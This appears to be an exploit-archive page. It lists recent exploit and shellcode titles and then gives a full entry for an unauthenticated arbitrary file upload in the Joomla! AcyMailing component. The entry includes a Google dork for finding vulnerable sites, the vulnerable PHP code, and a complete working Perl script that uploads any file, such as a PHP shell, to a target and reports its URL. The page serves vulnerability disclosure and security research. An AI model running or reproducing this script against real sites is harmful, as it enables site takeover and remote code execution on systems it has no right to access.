
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
191 lines
No EOL
5.3 KiB
Text
191 lines
No EOL
5.3 KiB
Text
# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload
|
|
# Google Dork: inurl:"index.php?option=com_acym"
|
|
# Date: 2020-03-16
|
|
# Exploit Author: qw3rTyTy
|
|
# Vendor Homepage: https://www.acyba.com/
|
|
# Software Link: https://www.acyba.com/acymailing/download.html
|
|
# Version: v6.9.1 Starter
|
|
# Tested on: Joomla! v3.9.0
|
|
# CVE: N/A
|
|
|
|
|
|
########################################################################################
|
|
#Analysis of vulnerability
|
|
########################################################################################
|
|
Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php".
|
|
|
|
[BEGIN_CODE]
|
|
600 public function setNewIconShare()
|
|
601 {
|
|
602 $socialName = acym_getVar('string', 'social', '');
|
|
603 $extension = pathinfo($_FILES['file']['name']);
|
|
604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName;
|
|
605 $newPathComplete = $newPath.'.'.$extension['extension'];
|
|
606 //There code is no checking CSRF token, no sanitizing, and authentication.
|
|
607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!!
|
|
608 echo 'error';
|
|
609 exit;
|
|
610 }
|
|
611
|
|
612 $newConfig = new stdClass();
|
|
613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true);
|
|
614
|
|
615 $newImg = acym_rootURI().$newPathComplete;
|
|
616 $newImgWithoutExtension = acym_rootURI().$newPath;
|
|
617
|
|
618 $newConfig->social_icons[$socialName] = $newImg;
|
|
619 $newConfig->social_icons = json_encode($newConfig->social_icons);
|
|
620 $this->config->save($newConfig);
|
|
621
|
|
622 echo json_encode(
|
|
623 [
|
|
624 'url' => $newImgWithoutExtension,
|
|
625 'extension' => $extension['extension'],
|
|
626 ]
|
|
627 );
|
|
628 exit;
|
|
629 }
|
|
|
|
function acym_uploadFile($src, $dest)
|
|
{
|
|
$dest = acym_cleanPath($dest);
|
|
|
|
$baseDir = dirname($dest);
|
|
if (!file_exists($baseDir)) {
|
|
acym_createFolder($baseDir);
|
|
}
|
|
|
|
if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!!
|
|
if (@chmod($dest, octdec('0644'))) {
|
|
return true;
|
|
} else {
|
|
acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error');
|
|
}
|
|
} else {
|
|
acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error');
|
|
}
|
|
|
|
return false;
|
|
}
|
|
[END_CODE]
|
|
|
|
########################################################################################
|
|
#Exploit
|
|
########################################################################################
|
|
#!/usr/bin/perl
|
|
#
|
|
#$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php
|
|
use strict;
|
|
use warnings;
|
|
use LWP::UserAgent;
|
|
use JSON(qw/decode_json/);
|
|
########################################################################################
|
|
sub print_usage_and_exit
|
|
{
|
|
print("*** com_acym Arbitrary File Upload exploit\n");
|
|
print("Usage: $0 <URL> <path_to_upload> <file_to_upload>\n");
|
|
print("\n");
|
|
|
|
exit();
|
|
}
|
|
|
|
sub fetch_useragent
|
|
{
|
|
my @available_useragents = (
|
|
"gertrud barkhorn",
|
|
"erica hartmann",
|
|
"eila ilmatar juutilainen",
|
|
);
|
|
|
|
return($available_useragents[(rand(scalar(@available_useragents)))]);
|
|
}
|
|
|
|
sub is_valid_url
|
|
{
|
|
my $given_url = shift(@_);
|
|
|
|
return 1 if ( $given_url =~ /^http(s)?:\/\// );
|
|
return 0;
|
|
}
|
|
|
|
sub do_die
|
|
{
|
|
my $errmsg = shift(@_);
|
|
|
|
printf("[!] %s\n", $errmsg);
|
|
exit();
|
|
}
|
|
|
|
sub get_base_path
|
|
{
|
|
return(sprintf("%s/index.php", $_[0]));
|
|
}
|
|
|
|
sub do_exploit
|
|
{
|
|
my %params = %{ shift(@_); };
|
|
my $ua = LWP::UserAgent->new(
|
|
"agent" => $params{"useragent"},
|
|
"timeout" => 360
|
|
);
|
|
|
|
print("[+] Trying to exploit ...\n");
|
|
print("[*] Sending POST request ...\n");
|
|
my $response = $ua->post(
|
|
get_base_path($params{"url"}),
|
|
"Content-Type" => "form-data",
|
|
"Accept-Language" => "zh-cn",
|
|
"Content" => {
|
|
"option" => "com_acym",
|
|
"ctrl" => "frontmails",
|
|
"task" => "setNewIconShare",
|
|
"social" => $params{"path"},
|
|
"file" => [ $params{"file"} ],
|
|
},
|
|
);
|
|
|
|
if ( $response->code == 200 )
|
|
{
|
|
my $j = decode_json($response->decoded_content);
|
|
my $f = sprintf("%s.%s",
|
|
$j->{"url"}, $j->{"extension"});
|
|
my $response = $ua->head($f);
|
|
|
|
printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 );
|
|
}
|
|
}
|
|
|
|
sub main
|
|
{
|
|
print_usage_and_exit() if ( scalar(@ARGV) < 2 );
|
|
|
|
my %params = (
|
|
"url" => $ARGV[0],
|
|
"path" => $ARGV[1],
|
|
"file" => $ARGV[2],
|
|
"useragent" => fetch_useragent());
|
|
|
|
do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) );
|
|
do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0);
|
|
printf("[*] Parameters:\n");
|
|
|
|
while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); }
|
|
printf("*" x50 . "\n");
|
|
|
|
while ( 1 )
|
|
{
|
|
printf("[?] Proceed(y/n)> ");
|
|
|
|
my $c = <STDIN>;
|
|
chomp($c);
|
|
|
|
if ( (length($c) == 1) and lc($c) eq "y" )
|
|
{
|
|
do_exploit(\%params);
|
|
last;
|
|
}
|
|
}
|
|
}
|
|
|
|
main();
|
|
######################################################################################## |